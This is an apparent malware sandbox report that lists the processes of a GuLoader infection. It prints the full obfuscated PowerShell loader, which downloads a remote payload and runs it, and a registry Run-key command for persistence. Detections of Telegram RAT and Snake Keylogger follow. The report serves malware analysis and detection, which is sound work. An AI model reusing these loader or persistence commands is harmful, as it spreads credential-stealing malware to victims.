loiDisaN.uregReve.BasitRearhRundRSvedelimpaManidNabl]Spen:Pred:Bum.sUdl.LApp eCarpE.aggPU og(skry4Be,a0Elae0Baan0Squa)');Verdensbermthedernes242 (Pachyhematous214 'Fyns$Ka.egPiknLNonioBiflBBarfaSaddlUpro:R ndM Care FisMTherOskudRSkovB redc,dlaRMart=Arbe(omvet HybEstroSbrecTVol - SerpZym aOpkrt recHapis Feci$ColoAR adr reaB SlaeChurJErhvd MalSSkriMSorgeLayoTFlamOFladdVlgeeSujer Tw n BarEV rkSP nn)') ;Verdensbermthedernes242 (Pachyhematous214 'Over$SlangC aulsobiounviBTeguAMistL,nox: reAHemacTrolQSup UosteiAdverStu EBen,ROrth=Coeq$ExotGRy,eLCausORetsBToskaMuscLSokk: UndN I pySpeltReseTpi oiBjlkgP gwS TppT IceEScul+P.as+ ek% Paa$Feert paOTinsf TidOHageR StaeLivs. EpecDds oKi eU parn andt') ;$Imperativ=$Tofore[$Acquirer]}$Sercial=324094;$Skrottede=30955;Verdensbermthedernes242 (Pachyhematous214 'Kaby$SamagHurtLFe.sOSa mB.emiAWaylLMata:SysttHoveA DialskivT HalEB oeg Unhn tomSReta dri=hand tamGMakre StrT psp- CutCAsseOHarmN SkrT H beUnv.n S.atCisa Forh$Ryt Aco tr JenbIndseSe eJEccadTvinS SalMPaase MalTUndeOincedLam,eAdjer PhlnPrecEindes');Verdensbermthedernes242 (Pachyhematous214 'over$BevggPropl.ylio lurbPoneaUnralSide:PneuDPinheRgtolLadylSubosEquin V,ni.isinKappg .nce atinT.rnsFlor Sats=Fo,u Styk[Ch oSMe ayTa tsPeritIntreDagrmV.nt.S.ueCOrb oHomenSystv B,ye AntrTendt Iso] Un.:coca: T.lFpersr FlaoGonomskovB Auna Mi sPaa e Stu6K,nt4KmniSlaustUnr rAlfaiRec nTilrg er(Barn$Dev TArbeaO.oml CertSpire ntugShelnFolisElko)');Verdensbermthedernes242 (Pachyhematous214 'Amfi$Smi.GSpilLStanoNe eBRaitaFumlLCris:Un aAUns,N SkrtGenfITonic ygosUnde Arve=Maya Str[MultSThorYVampSAllhTNotoeHoveM Epi.SkartK aseBounxCompTPr,m.WorlES epnAktic figo EeldKorpi rboNUphogUnst]Pr b:Legi:For.AO ersPhytCM.tzI impiSlre.Sugag.inke ompTHells jacT mo RA.tii,edsnUndigForf(Siss$PrimdSkraEYikeLAngiL CyksAilan,ebaICantN BygGPjuseTaraNEoghS r,s)');Verdensbermthedernes242 (Pachyhematous214 'Vejn$VulggEntelIndloBlocbPi.oA SkvLJing:br nrAbouESvi.tRe inJudgI RunNso sG .ntsLumiLBuksI S anu lriKr,lESpa rGangSNond=.nse$Ta,gAA loNOverTKapiiUnmecVesisUldt.Gal S AndUKonsbS rasvi eTForsRPygmiLum,N fvGJemm( Spg$Likos Sc.eunderPonec utuiStreaIn rlEuca, Gar$ g nsC,rdKUnilR TiaOAmmotPoecTTinkEKursdOdinEDi.p)');Verdensbermthedernes242 $Retningsliniers;"
                                                                                Imagebase:0x7ff745e70000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:14:15:31
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff74be10000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:14:15:44
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoProbpta epMor,eStrisProd]Ne n=K te$FunkBSpore ,lieFl.ctAfvnlprese');$elkesaite=Pachyhematous214 '.ack$Kn.pBDag eEnevtIngoaUn ulSquaiS ronC ttg,uresNo.oeForuvTambn.lite Pam.T.olD Ca o Praw uninstatl Unoo EftaEmbedSnouFBlaniKd.rlHormeGang(Tjen$ H,uIAnkemA.bep Us,e FosrA,taaFurntRi ai ,xyvVete, eb$ LuwAS,mlrAnagbsub e ExpjSubjdU desFr,sm orveScalt AdjoToivdGianeEc,orTurbn Sike Ud sTo p)';$Arbejdsmetodernes=$Glyn;Verdensbermthedernes242 (Pachyhematous214 'Flik$Pos,GCla L aruo decBHyalakat.LOver:Sy tmDkmaeDoorMdiapo Astr.emibUn eC tigRHegn=Over( Lovt.pauENsk S NonTCurm-F erp AmaaCirctNea.h tat Inte$I,sua Lb RMatebArveEOverJLed DEyepSsan mpa eEN ncTSto oPremd BegEIncuRScopnbrugeWinds Tro)');while (!$Memorbcr) {Verdensbermthedernes242 (Pachyhematous214 'Mid $TettgPejllEnmeoudg,bPr laPa al Uds: ChyE PrkfSpejtForaeLubrrstersDisttUmpir M sbSojaeimm.lKo.tsU,bue illr ClesFolk=Po,i$FermGStagiPrivg Chaa PunrSegntF ouiCorrnTy aa W,rlKaskeSouls') ;Verdensbermthedernes242 $elkesaite;Verdensbermthedernes242 (Pachyhematous214 'I,ra[ PibTIndsh FarRTeksEParaASursdB loiDisaN.uregReve.BasitRearhRundRSvedelimpaManidNabl]Spen:Pred:Bum.sUdl.LApp eCarpE.aggPU og(skry4Be,a0Elae0Baan0Squa)');Verdensbermthedernes242 (Pachyhematous214 'Fyns$Ka.egPiknLNonioBiflBBarfaSaddlUpro:R ndM Care FisMTherOskudRSkovB redc,dlaRMart=Arbe(omvet HybEstroSbrecTVol - SerpZym aOpkrt recHapis Feci$ColoAR adr reaB SlaeChurJErhvd MalSSkriMSorgeLayoTFlamOFladdVlgeeSujer Tw n BarEV rkSP nn)') ;Verdensbermthedernes242 (Pachyhematous214 'Over$SlangC aulsobiounviBTeguAMistL,nox: reAHemacTrolQSup UosteiAdverStu EBen,ROrth=Coeq$ExotGRy,eLCausORetsBToskaMuscLSokk: UndN I pySpeltReseTpi oiBjlkgP gwS TppT IceEScul+P.as+ ek% Paa$Feert paOTinsf TidOHageR StaeLivs. EpecDds oKi eU parn andt') ;$Imperativ=$Tofore[$Acquirer]}$Sercial=324094;$Skrottede=30955;Verdensbermthedernes242 (Pachyhematous214 'Kaby$SamagHurtLFe.sOSa mB.emiAWaylLMata:SysttHoveA DialskivT HalEB oeg Unhn tomSReta dri=hand tamGMakre StrT psp- CutCAsseOHarmN SkrT H beUnv.n S.atCisa Forh$Ryt Aco tr JenbIndseSe eJEccadTvinS SalMPaase MalTUndeOincedLam,eAdjer PhlnPrecEindes');Verdensbermthedernes242 (Pachyhematous214 'over$BevggPropl.ylio lurbPoneaUnralSide:PneuDPinheRgtolLadylSubosEquin V,ni.isinKappg .nce atinT.rnsFlor Sats=Fo,u Styk[Ch oSMe ayTa tsPeritIntreDagrmV.nt.S.ueCOrb oHomenSystv B,ye AntrTendt Iso] Un.:coca: T.lFpersr FlaoGonomskovB Auna Mi sPaa e Stu6K,nt4KmniSlaustUnr rAlfaiRec nTilrg er(Barn$Dev TArbeaO.oml CertSpire ntugShelnFolisElko)');Verdensbermthedernes242 (Pachyhematous214 'Amfi$Smi.GSpilLStanoNe eBRaitaFumlLCris:Un aAUns,N SkrtGenfITonic ygosUnde Arve=Maya Str[MultSThorYVampSAllhTNotoeHoveM Epi.SkartK aseBounxCompTPr,m.WorlES epnAktic figo EeldKorpi rboNUphogUnst]Pr b:Legi:For.AO ersPhytCM.tzI impiSlre.Sugag.inke ompTHells jacT mo RA.tii,edsnUndigForf(Siss$PrimdSkraEYikeLAngiL CyksAilan,ebaICantN BygGPjuseTaraNEoghS r,s)');Verdensbermthedernes242 (Pachyhematous214 'Vejn$VulggEntelIndloBlocbPi.oA SkvLJing:br nrAbouESvi.tRe inJudgI RunNso sG .ntsLumiLBuksI S anu lriKr,lESpa rGangSNond=.nse$Ta,gAA loNOverTKapiiUnmecVesisUldt.Gal S AndUKonsbS rasvi eTForsRPygmiLum,N fvGJemm( Spg$Likos Sc.eunderPonec utuiStreaIn rlEuca, Gar$ g nsC,rdKUnilR TiaOAmmotPoecTTinkEKursdOdinEDi.p)');Verdensbermthedernes242 $Retningsliniers;"
                                                                                Imagebase:0x9c0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1532628445.0000000008CC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1532737560.000000000E6CC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1510725943.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:14:15:44
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff74be10000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:14:15:51
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff78b730000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:17
                                                                                Start time:14:16:19
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                Imagebase:0x360000
                                                                                File size:59'904 bytes
                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.2189282837.0000000025ADB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.2189282837.00000000258F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:18
                                                                                Start time:14:16:27
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"
                                                                                Imagebase:0xd50000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:14:16:27
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff74be10000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:14:16:27
                                                                                Start date:12/03/2025
                                                                                Path:C:\Windows\SysWOW64\reg.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Faderskabernes" /t REG_EXPAND_SZ /d "%Demiowl% -windowstyle 1 $Piddlingly=(gi 'HKCU:\Software\Underforstaaende\').GetValue('Udbetalingskortet');%Demiowl% ($Piddlingly)"
                                                                                Imagebase:0x7ff79f290000
                                                                                File size:59'392 bytes
                                                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Reset < >